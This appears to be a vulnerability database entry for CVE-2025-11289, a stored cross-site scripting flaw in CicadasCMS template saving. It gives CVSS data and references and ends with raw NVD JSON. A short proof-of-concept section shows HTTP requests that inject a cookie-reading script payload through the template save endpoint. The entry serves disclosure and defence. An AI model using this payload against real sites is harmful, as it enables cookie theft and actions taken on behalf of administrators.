CVE-2025-11289

Description

A vulnerability was determined in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. The impacted element is the function Save of the file src/main/java/com/zhiliao/common/template/TemplateFileServiceImpl.java of the component Template Management Page. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:westboy:cicadascms:1.0:*:*:*:*:*:*:* - VULNERABLE

westboy CicadasCMS <= 2431154dac8d0735e04f1fd2a3c3556668fc8dab

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2025-11289: CicadasCMS Template Management XSS -->
<!-- Attack vector: Stored XSS via Template Save function -->
<!-- Target: src/main/java/com/zhiliao/common/template/TemplateFileServiceImpl.java -->

// Step 1: Login as admin user (requires high privileges)
POST /admin/login HTTP/1.1
Host: target-cicadas-cms.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=admin_password

// Step 2: Navigate to Template Management page
GET /admin/template/list HTTP/1.1
Host: target-cicadas-cms.com

// Step 3: Inject malicious XSS payload via the Save function
POST /admin/template/save HTTP/1.1
Host: target-cicadas-cms.com
Content-Type: application/x-www-form-urlencoded

templateName=<script>alert(document.cookie)</script>&templateContent=<img src=x onerror=alert(1)>

// Step 4: When another user (especially admin) views the template page,
// the malicious script executes in their browser context
// This can be used to steal cookies, perform actions on behalf of the user,
// or redirect to malicious sites

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11289
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11289
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11289/
[4] VulDB https://vuldb.com/cve/CVE-2025-11289
[5] https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md
[6] https://vuldb.com/?ctiid.327170
[7] https://vuldb.com/?id.327170
[8] https://vuldb.com/?submit.659789
[9] https://vuldb.com/?submit.709804
[10] https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11289", "sourceIdentifier": "[email protected]", "published": "2025-10-05T11:16:02.210", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. The impacted element is the function Save of the file src/main/java/com/zhiliao/common/template/TemplateFileServiceImpl.java of the component Template Management Page. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:westboy:cicadascms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9379B538-FA85-401F-9C78-CA16985000E1"}]}]}], "references": [{"url": "https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327170", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327170", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659789", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.709804", "source": "[email protected]"}, {"url": "https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}